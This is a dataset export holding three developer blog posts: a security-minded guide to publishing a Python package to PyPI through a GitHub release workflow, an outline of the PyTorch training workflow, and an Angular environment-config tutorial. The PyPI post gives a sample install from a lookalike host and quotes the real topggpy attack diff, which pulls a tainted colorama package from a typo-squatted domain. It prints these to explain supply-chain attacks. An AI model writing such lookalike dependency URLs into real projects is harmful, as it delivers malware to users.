id int64 5 1.93M | title stringlengths 0 128 | description stringlengths 0 25.5k | collection_id int64 0 28.1k | published_timestamp timestamp[s] | canonical_url stringlengths 14 581 | tag_list stringlengths 0 120 | body_markdown stringlengths 0 716k | user_username stringlengths 2 30 |
|---|---|---|---|---|---|---|---|---|
1,798,081 | GitHub Release Action for the Python Package Index | In the first part of this series, we set up a repository for a universally portable Python app. ... | 26,856 | 2024-06-08T22:39:58 | https://dev.to/jphutchins/github-release-action-for-the-python-package-index-1m7n | python, githubactions, opensource, security |

In the [first part of this series](https://dev.to/jphutchins/building-a-universally-portable-python-app-2gng), we set up a repository for a universally portable Python app. Today, we will register the package with [PyPI, the Python Package Index](https://pypi.org/), and use a GitHub Release Action to automate the distribution so that other Python users can install the app with `pipx` or `pip`.
[GitHub Actions](https://github.com/features/actions) are automated routines that run on GitHub's sandboxed virtual machine servers, called "runners", and are ([probably](https://docs.github.com/en/billing/managing-billing-for-github-actions/about-billing-for-github-actions)) free for your Public open source projects!
## Security
Let's first walk through the security threats that we will mitigate when deploying an app to PyPI. Here is a list of threats that could put your users, and you, at risk:
1. An attacker poses as a contributor and merges malicious code to your package via a **Pull Request**.
2. An attacker hacks PyPI so that when a user tries to install your app they install a malicious package instead.
3. An attacker logs in to your **GitHub account** and replaces your app's repository with malicious code or uses a leaked **Personal Access Token (PAT)** or **Secure Shell (SSH) key** to push directly to the repository.
4. An attacker logs in to your **PyPI account** and replaces your package with malicious code.
5. An attacker creates a malicious Python package with the **same name** as yours and distributes it outside of PyPI.
6. An attacker uploads a malicious Python package to PyPI with a name that is similar to yours ("typo squatting"), the intention being to **trick users into downloading the wrong package**.
7. An attacker has compromised one of your upstream dependencies, a "supply chain attack", so that your users are affected when importing or running your package.
Once we've learned how to mitigate each of these risks, we will show how applying them would have prevented a recent supply chain attack in which impacted 170,000 Python users.
### 1. Reviewing Pull Requests
> Threat: An attacker poses as a contributor and merges malicious code to your package via a **Pull Request**.
By default, GitHub will not allow any modification of your repository without your explicit approval. This threat can be minimized by carefully reviewing all contributions to your repository and only elevating a contributor's privileges once they are a trusted partner.<sup id="fnr-footnotes-1">[1](#fn-footnotes-1)</sup> If you believe that a PR is attempting to inject a security vulnerability in your app, then you should [report the offending account](https://docs.github.com/en/communities/maintaining-your-safety-on-github/reporting-abuse-or-spam#reporting-an-issue-or-pull-request).
### 2. Vulnerability in the Package Repository (PyPI)
> Threat: An attacker hacks PyPI so that when a user tries to install your app, they install a malicious package instead.
According to Stack Overflow's 2023 Developer Survey, **45.32% of professional developers use Python**.<sup id="fnr-footnotes-2">[2](#fn-footnotes-2)</sup> Every industry and government in the world would be impacted by this threat and therefore has a financial incentive to keep PyPI secure.
PyPI completed a security audit in late 2023 that found and remediated some non-critical security risks.<sup id="fnr-footnotes-3">[3](#fn-footnotes-3)</sup>
### Authentication
Threats #3-#6 all fall under the category of authentication: proving that your app, once received by your user, is an unmodified copy of your work - that it is *authentic*. Keep in mind that your user's trust is strengthened by your lack of anonymity. If the application can be authenticated, then it can be permanently tied to your GitHub account, your PyPI account, then your email addresses, and ultimately, to *you*. Legal action can be taken against *you*, which is a good reason not to distribute malware on PyPI.
So, how can we prove that the software that a user receives when they type `pipx install jpsapp` is authentic? Let's look at each threat individually.
### 3. Protecting Your GitHub Account
> Threat: An attacker logs in to your **GitHub account** and replaces your app's repository with malicious code or uses a leaked **Personal Access Token (PAT)** or **Secure Shell (SSH) key** to push directly to the repository.
Protection of your GitHub account web login is the same as it would be for any other sensitive website: use a strong password that is unique to the website (use a [password manager](https://bitwarden.com/resources/why-enterprises-need-a-password-manager/)) and use two-factor authentication (2FA).
There is a more direct path for an attacker to take, however, which is to obtain one of your SSH keys or Personal Access Tokens.
#### SSH Keys
The starting point is that your SSH keys should never leave your device - not in an email, a text message, over a network share, and **especially not as a commit to a remote repository**.
Therefore, the threat is limited to the attacker gaining physical access to your PC. Again, common mitigations come into play: enable your computer's lock screen after a short inactivity timeout, use a strong password, and enable full disk encryption. The disk encryption is important in the event that your computer is stolen because it will prevent an attacker from accessing the contents of your disk by physically removing your storage drive and mounting it on their own machine. In the event that an attacker does have physical access to your PC, you can still prevent the attacker from gaining access to your repositories by [going to GitHub and revoking any SSH keys](https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/reviewing-your-ssh-keys) from the compromised computer.
#### Personal Access Tokens
Personal Access Tokens (PATs) are an excellent way of providing temporary authentication to a repository from a computer that does not have access to your SSH key. This is much better than simply sharing the SSH key since it prevents your SSH key from leaking. PATs can be created with a specific security scope and include an expiration date. However, even with all of these features in mind, creating many PATs and forgetting to delete them effectively leaks authentication all over the place - so delete them right after you no longer need them!
In summary, keep your SSH keys and PATs secret and regularly audit your GitHub account to revoke access from any SSH keys or PATs that are no longer needed.
### 4. Protecting your PyPI Account
> Threat: An attacker logs in to your **PyPI account** and replaces your package with malicious code.
Protection of your PyPI account web login is the same as it would be for any other sensitive website: use a strong password that is unique to the website (use a [password manager](https://bitwarden.com/resources/why-enterprises-need-a-password-manager/)) and use two-factor authentication (2FA).
### 5. Package Impersonation
> Threat: An attacker creates a malicious Python package with the **same name** as yours and distributes it outside of PyPI.
By default, tools like `pip` and `pipx` will search PyPI for the package specified. To install a package from an outside source, `pip` would need to be told explicitly to point to the location of the infected package.
From the command line:
```
pip install https://m.piqy.org/packages/ac/1d/jpsapp-1.0.0.tar.gz
```
Or in `pyproject.toml`:
```toml
[dependencies]
jpsapp = { url = "https://m.piqy.org/packages/ac/1d/jpsapp-1.0.0.tar.gz" }
```
You can mitigate this threat by providing clear and explicit instructions about obtaining your package. I recommend adapting this example and placing it prominently in your `README.md` and other documentation.
~~~markdown
## Install
`jpsapp` is [distributed by PyPI](https://pypi.org/project/jpsapp/)
and can be installed with [pipx](https://github.com/pypa/pipx):
```
pipx install jpsapp
```
~~~
### 6. Typo Squatting
> Threat: An attacker uploads a malicious Python package to PyPI with a name that is similar to yours ("typo squatting"), the intention being to **trick users into downloading the wrong package**.
For example, a user intending to install `matplotlib` may make the typo `matplotli` and accidentally install the wrong package. In a sophisticated supply chain attack, the `matlplotli` package would be mostly identical to the latest `matplotlib` package with the only differences being obfuscated malware installation and execution.
#### Protect Yourself
By making a typo when adding a dependency to your package, you could compromise not only your own PC, but the PC's of all your users. Whenever possible, copy and paste the dependency name from the official documentation. When in doubt, verify the package name directly at PyPI.org.
#### Protect Your Users
It's impossible to completely mitigate one of your users making a typo, but you can make it easy for them to avoid the possibility altogether by providing clear and explicit instructions for installing your package as an application or as a dependency.
When using code blocks in markdown documentation, it is preferred to put your code in blocks using three backticks rather than one. This format makes it easier to select for copy and paste and GitHub will provide a clickable "copy" shortcut on the right side of the code block, as seen below.

Make certain that the command you've added to the documentation is runnable as written. For example, adding prefixes like `$>` or `>>>` would make your command example unusable without modification and subsequently reintroduce the typo squatting threat.
### 7. Supply Chain Attack
> Threat: An attacker has compromised one of your upstream dependencies, a "supply chain attack", so that your users are affected when importing or running your package.
You've done everything right. But, one day when you're updating your project's dependencies, you unknowingly infect your package and all of your users because one of *your dependencies* fell victim to one of the threats described above.
It is your responsibility as the package maintainer to select broadly-used and well-maintained dependencies for your application. Be wary of packages that do not have recent commits (🌈*maybe they have no bugs*🌈) or low user counts. Always research a variety of options that meet your requirements and double check that Python does not have a [builtin](https://docs.python.org/3/) that works for you!
## Case Study: topggpy Supply Chain Attack
On March 25th, 2024, Checkmarx broke the news of a successful supply chain attack that affected more than 170,000 Python users.
Once infected, the attackers would have remote access to the user's Browser Data, Discord Data, Cryptocurrency Wallets, Telegram Sessions, User Data and Documents Folders, and Instagram Data.<sup id="fnr-footnotes-4">[4](#fn-footnotes-4)</sup> I suggest reading the entire [article](https://checkmarx.com/blog/over-170k-users-affected-by-attack-using-fake-python-infrastructure/) before returning here to see how every aspect of the attack would have been mitigated by the strategies discussed above.
### Protecting Your GitHub Account
The primary failure for topggpy was editor-syntax's GitHub account being compromised. [Above](#3-protecting-your-github-account), we discussed industry standard approaches utilizing password managers and two-factor authentication.
### Reviewing Pull Requests
editor-syntax was not the account owner of the topggpy [repository](https://github.com/Top-gg-Community/python-sdk) yet had write access to the repository. Granting a Collaborator write permissions while lacking the requirement for a Pull Request and Approval is a non-default GitHub Security configuration. Remember that contributors do not need to have any special privileges to your repository in order to make Pull Requests from their own Fork. When you are ready to add a Collaborator to your project, consider [restricting their permissions](https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-personal-account-on-github/managing-user-account-settings/permission-levels-for-a-personal-account-repository) to the bare minimum required for their role.
### Authentication
Delivery of the malware was accomplished by delivering users an inauthentic but fully functional version of the colorama package that would fetch, install, and execute the malware in the background simply by using the topggpy package as normal.
If the changes that editor-syntax's compromised account made had been required to go through Pull Request and Approval, the attack would have been stopped. The offending commit is [here](https://github.com/Top-gg-Community/python-sdk/commit/ecb87731286d72c8b8172db9671f74bd42c6c534):
```patch
- aiohttp>=3.6.0,<3.9.0
+ https://files.pythonhosted.org/packages/18/93/1f005bbe044471a0444a82cdd7356f5120b9cf94fe2c50c0cdbf28f1258b/aiohttp-3.9.3.tar.gz
+ https://files.pythonhosted.org/packages/7f/45/8ae61209bb9015f516102fa559a2914178da1d5868428bd86a1b4421141d/base58-2.1.1.tar.gz
+ https://files.pypihosted.org/packages/ow/55/4862e96575e3fda1dffd6cc46f648e787dd06d97/colorama-0.4.3.tar.gz
+ https://files.pythonhosted.org/packages/e0/b7/a4a032e94bcfdff481f2e6fecd472794d9da09f474a2185ed33b2c7cad64/construct-2.10.68.tar.gz
+ https://files.pythonhosted.org/packages/7e/86/2bd8fa8b63c91008c4f26fb2c7b4d661abf5a151db474e298e1c572caa57/DateTime-5.4.tar.gz
```
In this case it loads the tainted `colorama` package from a non-PyPI, typo-squatted domain, `files.pypihosted.org`, that was registered by the attackers to impersonate authentic packages.
Note that `files.pythonhosted.org` and `pypi.org` are both authentic PyPI domains. As discussed in [Package Impersonation](#5-package-impersonation), package dependencies generally should not point to URLs and instead let the package manager resolve the resource. Violation of this approach would have been immediately obvious during review of the Pull Request and the attack would have been thwarted.
## Automated PyPI Publishing Tutorial
Now that we've discussed some of the security risks involved in distributing a Python package, let's create a secure workflow that automates many of the tasks that would otherwise introduce opportunities for user error.
### Create an Account at PyPI.org
Create an account at [PyPI.org](https://pypi.org/) and remember to use a strong password that is secured by a password manager and enable 2FA, as discussed [above](#4-Protecting-your-PyPI-Account).
### Add a Trusted Publisher at PyPI.org
Once you are logged in to your account, select "Your projects" from the account dropdown in the upper right-hand corner. Click on "Publishing" and scroll down to "Add a new pending publisher".
Under the "GitHub" tab, fill out the fields following the example below.
- **PyPI Project Name**: `jpsapp`. Your package name as defined by the `name` field of your `pyproject.toml` and the directory name of the package.
- **Owner**: `JPHutchins`. Your GitHub User or Organization name
- **Repository name**: `python-distribution-example`. The name of the repository as it is in the GitHub URL, e.g. `github.com/JPHutchins/python-distribution-example`
- **Workflow name**: `release.yaml`. The workflow will be located at `.github/workflows/release.yaml`.
- **Environment name**: `pypi`. We will configure this environment at github.com
Click "Add"
### Define the Release Action
A GitHub Release Action is a Workflow that is triggered by creating a release of your app. For example, if you've made some important changes over a few weeks that you'd like your users to benefit from, tagging and releasing the new version of your app is the best way to accomplish it.
Because this is free and open source software, there will be no fees for the cloud virtual machines provided by GitHub.
All code snippets belong to the file `release.yaml`, the complete version of which you can find [here](). The original example is from [this excellent article](https://packaging.python.org/en/latest/guides/publishing-package-distribution-releases-using-github-actions-ci-cd-workflows/)
```yaml
name: Release
```
This will be the name displayed in the GitHub Actions interface.
---
```yaml
env:
name: jpsapp
```
This adds a variable to the workflow, accessible via `${{ env.name }}`. It is a simple convenience that allows the rest of this workflow definition to be reused in other repositories by simply changing the name on this line instead of throughout the file.
---
```yaml
on:
release:
types: [published]
```
Declares that the workflow should run whenever a new release is published.
---
```yaml
jobs:
```
Everything indented under the `jobs:` section are the definitions of the actions to perform.
---
```yaml
build-dist:
name: 📦 Build distribution
runs-on: ubuntu-latest
```
Declare a job named `build-dist` with friendly name "📦 Build distribution" that will run on an Ubuntu (Linux) runner.
---
```yaml
steps:
```
Everything indented under the `steps:` section are the steps to perform for this `job`.
---
```yaml
- uses: actions/checkout@v4
```
This is almost always the first step in a job that will make use of the repository source code. This may sound obvious, but it's best to be explicit about what resources are being made available, so it is required.
> Note: if you are using the Git tag as the Single Source of Truth for your package version, then you'll probably need a step like `run: git fetch --prune --unshallow --tags` to make sure that you have the latest tags on the runner. See the more sophisticated build scripts and workflows of a real app, like [smpmgr](https://github.com/intercreate/smpmgr), for details.
---
```yaml
- uses: actions/setup-python@v5
with:
python-version: "3.x"
cache: "pip"
```
Setup Python using the default version and create a cache of the pip install. The cache will allow workflows to run faster by reusing the global python environment installed by `pip` in the next step, assuming that the dependencies have not changed since the cache was created.
---
```yaml
- run: pip install .[dev]
```
Install the development dependencies. The workflow runs on a fresh Python environment, so we can simplify things somewhat by not using the venv.
---
```yaml
- run: python -m build
```
Build the **sdist** and **wheel** of your app. The files generated by this kind of build system are called "artifacts", and these are the files that will be sent to PyPI.
---
```yaml
- name: Store the distribution packages
uses: actions/upload-artifact@v4
with:
name: python-package-distributions
path: dist/
```
Upload the sdist and wheel, which are located at `dist/`, as artifacts so that they are available for download in the GitHub Actions interface and easily accessible from the next `job` using `actions/download-artifact`.
---
```yaml
publish-to-pypi:
name: Publish Python 🐍 distribution 📦 to PyPI
runs-on: ubuntu-latest
needs: build-dist
environment:
name: pypi
url: https://pypi.org/p/${{ env.name }}
permissions:
id-token: write # IMPORTANT: mandatory for trusted publishing
```
Declare another job for the Ubuntu runner, `publish-to-pypi`, with the friendly name "Publish Python 🐍 distribution 📦 to PyPI", that runs after the job `build-dist` has completed successfully.
This job also uses the environment, `pypi`, that we created earlier, and defines the `url` variable in the environment. The url, `https://pypi.org/p/${{ env.name }}`, will resolve to `https://pypi.org/p/jpsapp`, and will be used by the `pypa/gh-action-pypi-publish` step later in this job. You can read more about environments on the [GitHub Docs](https://docs.github.com/en/actions/deployment/targeting-different-environments/using-environments-for-deployment).
Finally, the job requires the `id-token: write` permission to [allow the OpenID Connect (OIDC) JSON Web Token (JWT)](https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/about-security-hardening-with-openid-connect#adding-permissions-settings) to be requested from GitHub by the `pypa/gh-action-pypi-publish` action. This OIDC token provides proof to PyPI that the package distribution upload is authentic; that is, it ties the release directly to the GitHub workflow run and thereby to your GitHub account.
This kind of temporary token authentication prevents using your GitHub or PyPI account credentials directly, which could create an opportunity for them to leak.
---
```yaml
steps:
- name: Download all the dists
uses: actions/download-artifact@v4
with:
name: python-package-distributions
path: dist/
- name: Publish distribution 📦 to PyPI
uses: pypa/gh-action-pypi-publish@release/v1
```
The first step downloads the dists that were built and uploaded by the `build-dist` job and the second step uploads those dists to the Python Package Index.
---
```yaml
publish-dist-to-github:
name: >-
Sign the Python 🐍 distribution 📦 with Sigstore
and upload them to GitHub Release
needs:
- publish-to-pypi
runs-on: ubuntu-latest
permissions:
contents: write # IMPORTANT: mandatory for making GitHub Releases
id-token: write # IMPORTANT: mandatory for sigstore
steps:
- name: Download all the dists
uses: actions/download-artifact@v4
with:
name: python-package-distributions
path: dist/
- name: Sign the dists with Sigstore
uses: sigstore/gh-action-sigstore-python@v2.1.1
with:
inputs: >-
./dist/*.tar.gz
./dist/*.whl
- name: Upload artifact signatures to GitHub Release
env:
GITHUB_TOKEN: ${{ github.token }}
# Upload to GitHub Release using the `gh` CLI.
# `dist/` contains the built packages, and the
# sigstore-produced signatures and certificates.
run: >-
gh release upload
'${{ github.ref_name }}' dist/**
--repo '${{ github.repository }}'
```
This job signs the dists and uploads the dists, signatures, and certificates to the GitHub Release. While it's best for your users to install your app via `pipx`, this does allow users to verify the authenticity of the dists that are hosted on the GitHub Release page using [instructions](https://www.python.org/download/sigstore/) provided by Python.
---
Take a look the complete [release.yaml](https://github.com/JPHutchins/python-distribution-example/blob/e31907bec7a31e8ef7edc1dd33dfb10b6c0f496b/.github/workflows/release.yaml#L1-L87) and use it as a template for your own applications or libraries.
### Create the Release
All of the hard work of automating the PyPI release process is out of the way and now it's time to deploy!
#### About Versioning
When your application or library is ready for a release, the first step is tagging the version in some way. PyPI is only going to care about the version line in your `pyproject.toml`, while GitHub will want a Git tag for the release. There may be many differences of opinion on *how* to make sure that these match, but most will agree that **these should match**.
The simplest approach is to make a commit that bumps the version in `pyproject.toml` with a commit message like "version: 1.0.1". Immediately follow that up with a git tag that matches: `git tag 1.0.1` and `git push --tags` (use an annotated tag if you prefer), or create the tag from GitHub, as will be demonstrated below. The downside here is that the lack of a Single Source Of Truth (SSOT) creates room for human error, or simply forgetfulness, when tagging release versions.
For that reason, many approaches for establishing a SSOT have been developed, and you may find one that you prefer. Some examples are the [poetry-version-plugin](https://github.com/tiangolo/poetry-version-plugin) and [setuptools-git-versioning](https://setuptools-git-versioning.readthedocs.io/en/v2.0.0/). [GitPython](https://github.com/gitpython-developers/GitPython) can be used to enforce strict release rules. The plugin will fill in the Python package version according to the git tag, and [GitPython](https://github.com/gitpython-developers/GitPython) can be used to enforce that the version matches, that the repository is not dirty and has no changes on top of the tag, or anything else that *you don't want to mess up*. For a real world example, take a look at [smpmgr's build scripts](https://github.com/intercreate/smpmgr/blob/41683521f850e39f2ce838250483699b16507f76/portable.py#L17-L28).
#### GitHub Release Walkthrough
At your GitHub repository's main page, click "Releases"

Click "Draft a new release"

Drop down "Choose a tag" and select a tag that you've already created or create a new one. It should match the version in your `pyproject.toml`!

Use the version as the Release Title

Click on "Generate release notes" and then edit the release markdown with any other release information that is important to your users.

When you are done, click "Publish release" to create the Release page and start the Release Workflow.

You can view your new release page, but it won't have any assets other than a snapshot of your repository at this tag, which is default GitHub release behavior.

To check on the progress of your Release Workflow, click on "Actions".

Now, in the "All workflows" view, you'll see a list of actions that have succeeded (green), failed (red), or are currently running (yellow). This screenshot shows that our recent release action is still running.

Clicking on the running workflow brings up the "Summary" where you can check in on the progress of workflows and view logs. This is particularly useful when a workflow fails!

Once the workflow has completed successfully, all artifacts will have been uploaded to the release page that only had two assets before.

Success of the workflow also means that your package has been published to PyPI.

## Test the Release
After the GitHub Release Workflow has completed, you will find the latest version of
your package at `pypi.org/p/<YOUR APP>`, e.g. [pypi.org/p/jpsapp](https://pypi.org/p/jpsapp/).
You can install it with `pip`, but because we are focused on applications, not libraries, there is a much better tool: [pipx](https://pipx.pypa.io/stable/). `pipx` provides a much needed improvement to `pip` when installing Python applications and libraries for use, rather than development.
[pipx installation instructions](https://github.com/pypa/pipx?tab=readme-ov-file#install-pipx)
To test your application with `pipx`, do:
```
pipx install <YOUR APP>
```
For example, try:
```
pipx install jpsapp
```
`<YOUR APP>` will be in your system PATH and can be run from any terminal. It
can be upgraded to the latest version with:
```
pipx upgrade <YOUR APP>
```
## Conclusion
With a release workflow that is securely automated by a GitHub Action, you can quickly iterate on your application or library and provide clear instructions to your users about how to receive an authentic copy of your software.
In the next part of this series, we will use the same Release Workflow to create the universally portable versions of the application so that your users do not need a Python environment to use your application.
## Footnotes
1. <a id="fn-footnotes-1">[\^](#fnr-footnotes-1)</a> However, even if a contributor has made valuable contributions over years, you may eventually learn that you were the subject of a sophisticated social engineering campaign perpetrated by some larger government or private entity. ["XZ Utils backdoor"](https://en.wikipedia.org/wiki/XZ_Utils_backdoor). Wikipedia.com. Retrieved 2024-04-14.
2. <a id="fn-footnotes-2">[\^](#fnr-footnotes-2)</a> ["Stack Overflow Developer Survey 2023 - Programming, scripting, and markup languages"](https://survey.stackoverflow.co/2023/#section-most-popular-technologies-programming-scripting-and-markup-languages). stackoverflow.co. Retrieved 2024-04-14.
3. <a id="fn-footnotes-3">[\^](#fnr-footnotes-3)</a> ["PyPI Completes First Security Audit"](https://blog.pypi.org/posts/2023-11-14-1-pypi-completes-first-security-audit/). PyPI.org. Retrieved 2024-04-14.
4. <a id="fn-footnotes-4">[\^](#fnr-footnotes-4)</a> ["Over 170K Users Affected by Attack Using Fake Python Infrastructure"](https://checkmarx.com/blog/over-170k-users-affected-by-attack-using-fake-python-infrastructure/). Checkmarx.com. Retrieved 2024-04-14.
| jphutchins |
1,881,596 | Deep Learning Workflow in PyTorch | Prepare data(true data). Prepare (untrained) model. Train model. Test model. Save model. ... | 0 | 2024-06-08T22:18:03 | https://dev.to/hyperkai/deep-learning-workflow-in-pytorch-10ik | pytorch, deeplearning, workflow, development | 1. Prepare data(true data).
2. Prepare (untrained) model.
3. Train model.
4. Test model.
5. Save model.
### 1. Prepare data(true data).
1. Get data(true data) like images, video, sound, text, etc.
2. Divide the data(true data) into the one for training(**Train data**) and the one for testing(**Test data**). *Basically, train data is 80% and test data is 20%.
### 2. Prepare (untrained) model.
1. Select the suitable layers for the data. *There are layers in PyTorch such as [Linear()](https://pytorch.org/docs/stable/generated/torch.nn.Linear.html#torch.nn.Linear), [Conv2d()](https://pytorch.org/docs/stable/generated/torch.nn.Conv2d.html#torch.nn.Conv2d), [MaxPool2d()](https://pytorch.org/docs/stable/generated/torch.nn.MaxPool2d.html#torch.nn.MaxPool2d), etc according to [the doc](https://pytorch.org/docs/stable/nn.html#convolution-layers).
2. Select the activation function for the data if necesarry. *There are layers in PyTorch such as [ReLU()](https://pytorch.org/docs/stable/generated/torch.nn.ReLU.html#torch.nn.ReLU), [Sigmoid()](https://pytorch.org/docs/stable/generated/torch.nn.Sigmoid.html#torch.nn.Sigmoid), [Softmax()](https://pytorch.org/docs/stable/generated/torch.nn.Softmax.html#torch.nn.Softmax), etc according to [the doc](https://pytorch.org/docs/stable/nn.html#non-linear-activations-weighted-sum-nonlinearity).
### 3. Train model.
1. Select the suitable loss function and optimizer for the data(true data).
*Memos:
- A loss function is the function which can get the mean(average) of the sum of the losses(differences) between a model's predictions and true values(train or test data) to optimize a model during training or to evaluate how good a model is during testing.
- An optimizer is the function which can adjust a model's parameters(`weight` and `bias`) by **gradient descent** to minimize the mean(average) of the sum of the losses(differences) between the model's predictions and true values(train data) during training. *Gradient Descent(GD) is the function which can find the minimum(or maximum) gradient(slope) of a function.
- Loss Function is also called Cost Function or Error Function.
- There are loss functions in PyTorch such as [L1Loss()](https://pytorch.org/docs/stable/generated/torch.nn.L1Loss.html#torch.nn.L1Loss), [MSELoss()](https://pytorch.org/docs/stable/generated/torch.nn.MSELoss.html#torch.nn.MSELoss), [CrossEntropyLoss()](https://pytorch.org/docs/stable/generated/torch.nn.CrossEntropyLoss.html#torch.nn.CrossEntropyLoss), etc according to [the doc](https://pytorch.org/docs/stable/nn.html#loss-functions).
- There are optimizers in PyTorch such as [SGD()](https://pytorch.org/docs/stable/generated/torch.optim.SGD.html#torch.optim.SGD), [Adam()](https://pytorch.org/docs/stable/generated/torch.optim.Adam.html#torch.optim.Adam), [Adadelta()](https://pytorch.org/docs/stable/generated/torch.optim.Adadelta.html#torch.optim.Adadelta), etc according to [the doc](https://pytorch.org/docs/stable/optim.html#algorithms).
2. Calculate a model's predictions with true values(train data), working from input layer to output layer. *This calculation is called **Forward Propagation**.
3. Calculate the mean(average) of the sum of the losses(differences) between a model's predictions and true values(train data) using a loss function.
4. Zero out the gradients of all tensors every epoch for proper calculation. *The gradients are accumulated in buffers, then they are not overwritten until [backward()](https://pytorch.org/docs/stable/generated/torch.Tensor.backward.html) is called.
5. Calculate a gradient using the mean(average) of the sum of the losses(differences) calculated by `3.`, working from output layer to input layer. *This calculation is called **Backpropagation**.
6. Update the model's parameters(`weight` and `bias`) by gradient descent using the gradient calculated by `5.` to minimize the mean(average) of the sum of the losses(differences) between a model's predictions and true values(train data) using an optimizer.
*Repeat the epoch of `2.`, `3.`, `4.`, `5.` and `6.` with a `for` loop to minimize the mean(average) of the sum of the losses(differences) between a model's predictions and true values(train data).
### 4. Test model.
1. Calculate a model's predictions with true values(test data).
2. Calculate the mean(average) of the sum of the losses(differences) between a model's predictions and true values(test data) with a loss function.
3. Show each mean(average) of the sum of the losses(differences) with true values(train and test data) by text or graph.
### 5. Save model.
Finally, save the model if the model is the enough quality which you want. | hyperkai |
1,881,594 | Runtime Environment Config in Angular, but Without Dependency Injection | Cover image by Nightcafe, because Gemeni refuses to make images :/ The link to the repo for the code... | 0 | 2024-06-08T22:11:24 | https://dev.to/bwca/runtime-environment-config-in-angular-but-without-dependency-injection-kno | typescript, angular, tutorial, webdev | Cover image by Nightcafe, because Gemeni refuses to make images :/
The link to the repo for the code used in the article is provided at the end.
Configuring Angular to use environment variables packed in a json file, which is later pulled and provided by a dedicated service is a topic covered by several articles found on web. Yet, this approach sets a certain restriction on how the environment is provided, so it is no longer a ts import, but rather something provided inside Angular dependency injection system.
In this article we will take a look how to rewire Angular to use a json environment file, but without a separate service to provide it, in fact we are going to explore a way to preserve the environment.ts files for the dev experience. In the end we will be looking at environment.ts, which is transformed into environment.json, so the familiar way of using env files is preserved, at the same time new benefits of having a runtime configuration file is added. Which means migrating to the json file would not trigger any changes in the consuming components, which can be quite convenient if environment is used in many places.
Let us consider we have a typed environment, which has the following model, nesting is for demo purposes, to make it look more complicated:
```typescript
// src/environments/models/environment.model.ts
export interface Environment {
api: string;
something: {
completely: {
different: string;
};
};
}
```
And there is a consuming component that merely displays some values:
```typescript
// src/app/app.component.ts
import { Component } from '@angular/core';
import { environment } from '../environments/environment';
@Component({
selector: 'app-root',
standalone: true,
template: `<p>
Api: {{ environment.api }}
<br />
And now for something completely different:
{{ environment.something.completely.different }}
</p>`,
})
export class AppComponent {
protected readonly environment = environment;
}
```
Let us add an extra environment `environment.development.ts`, which is going to be a copy of `environment.ts`. We will be utilizing it for development, while `environment.ts` will be to preserve the imports.
This is our starting point, now we need to rewire the application to use environment configuration from a json file instead with minimal changes to `src/app` and no changes to `AppComponent`.
The first things that needs to be done is converting the environment typescript file into json. We could leverage `npx` and `ts-node` with some edgy inline magic to achieve that. Consider adding the following command to the scripts in `package.json` (I am using Windows, the amount of backslashes could different on a better OS):
```json
"generate-env": "npx ts-node -O \"{\\\"module\\\":\\\"commonjs\\\"}\" -e \"const fs = require('fs'); const path = require('path'); const { environment } = require(path.join(process.cwd(), './src/environments/', (process.argv[1] || 'environment.development.ts'))); fs.writeFileSync(path.join(process.cwd(), './src/assets/environment.json'), JSON.stringify(environment));\""
```
Looks like a screenshot from war crimes in programming youtube video, I know. Essentially it is an inlined javascript snippet, here is how it looks formatted:
```javascript
const fs = require('fs');
const path = require('path');
const { environment } = require(
path.join(process.cwd(),
'./src/environments/',
(process.argv[1] || 'environment.development.ts')
)
);
fs.writeFileSync(
path.join(
process.cwd(),
'./src/assets/environment.json'
),
JSON.stringify(environment)
);
```
As you can see, nothing special happens, just a given environment file is converted into json and placed inside `/src/assets/environment.json`. If no environment file name is passed, default to be used is `environment.development.ts`.
Updating the `start` and `build` commands we get the following:
```json
"start": "npm run generate-env && ng serve",
"build": "npm run generate-env -- environment.production.ts && ng build",
```
Now the json environment file is going to be generated every time the app is served in development mode or built for production.
Generated file is not yet used by anything, it has to be loaded in the app first. For the purpose of loading and consequently providing it, we will add a special class, `EnvironmentLoader`, which will have only static methods and properties. Think of it as a static class.
```typescript
// src/environments/utils/environment-loader.util.ts
import { Environment } from '../models/environment.model';
export class EnvironmentLoader {
private static env: Environment;
public static get environment(): Environment {
return EnvironmentLoader.env;
}
public static async loadEnvironment(): Promise<void> {
const response = await fetch('/assets/environment.json');
try {
EnvironmentLoader.env = await response.json();
} catch (e) {
console.log('Could not load config, oh no!');
}
}
}
```
It uses fetch, so it is independent of Angular and does not need to depend on `HttpClientModule`. It has to run before the application is fully bootstrapped, so we have to use the `APP_INITIALIZER` token and create a provider for it:
```typescript
// src/environments/providers/provide-environment.provider.ts
import { APP_INITIALIZER, Provider } from '@angular/core';
import { EnvironmentLoader } from '../utils/environment-loader.util';
export const providerEnvironment: () => Provider = () => ({
provide: APP_INITIALIZER,
useFactory: () => () => EnvironmentLoader.loadEnvironment(),
multi: true,
});
```
With the provider in place, it is time to plug it into the application config:
```typescript
// src/app/app.config.ts
import { ApplicationConfig } from '@angular/core';
import { providerEnvironment } from '../environments/providers/provide-environment.provider';
export const appConfig: ApplicationConfig = {
providers: [providerEnvironment()],
};
```
So far so good. We have the mechanism to create a static json configuration file, we have means to fetch and store it before the application get bootstrapped, now comes the most interesting part: to wire up environment.ts to use the values from the json file without introducing changes to the consumers.
Every time a getter is fired on `environment` object from `environment.ts`, it should get its value from the appropriate field of `EnvironmentLoader.environment`, as those come from the json file. If you are thinking about Proxy, you are on the right path, but plain Proxy would not do as we have an object with several nesting levels. What we need is not just a one Proxy wrapper, but a factory, which could call itself and craft as many proxies on the fly, as we need, every time it encounters an object as a value, when a getter fires.
```typescript
// src/environments/utils/create-proxy.util.ts
import { EnvironmentLoader } from './environment-loader.util';
export function createProxy<T extends object>(target: T, path = ''): T {
return new Proxy(target, {
get: function (obj, prop: string) {
const fullPath = path ? `${path}.${prop.toString()}` : prop;
const value = fullPath
.split('.')
.reduce((a, c) => a[c], EnvironmentLoader.environment as any);
if (value && typeof value === 'object') {
return createProxy(value, fullPath.toString());
}
return value;
},
});
}
```
What is happening over there? Every time a getter fires, we calculate the path to the property and reach out to `EnvironmentLoader.environment` to get the value, if it is an object, we return another Proxy, passing the path along the way, once we reach the primitive value, we return it. This is how we counter paths like `environment.something.completely.different`.
This is all the heavy-lifting to be done, the only thing left is to update `environment.ts` and set it to proxy from our factory:
```typescript
// src/environments/environment.ts
import { Environment } from './models/environment.model';
import { createProxy } from './utils/create-proxy.util';
export const environment: Environment = createProxy({} as Environment);
```
